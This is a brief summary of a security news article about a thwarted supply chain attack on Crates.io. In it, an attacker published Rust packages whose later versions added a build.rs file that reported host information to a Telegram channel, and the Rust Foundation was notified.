Rust Malware Staged on Crates.io: A Threat to Rust Developers

The article reveals a thwarted software supply chain attack against Rust developers. The attack was staged on Crates.io, a popular package registry for the Rust programming language. The attacker published several packages, starting with a harmless one that contained virtually no code. However, subsequent versions of the packages included malicious functionality. The attacker added a build.rs file that communicated host information back to a Telegram channel they were monitoring. This pattern is often seen with credential stealers in other ecosystems. The article emphasizes that this attack is likely the early preparations for a broader campaign, as the attacker is ramping up their efforts to compromise developers. The Rust Foundation was promptly notified of the attack, and measures were taken to prevent it from continuing. This incident highlights the importance of maintaining vigilance and implementing security measures in the software supply chain. Rust developers should be aware of the potential risks and stay updated on the latest security news in the industry.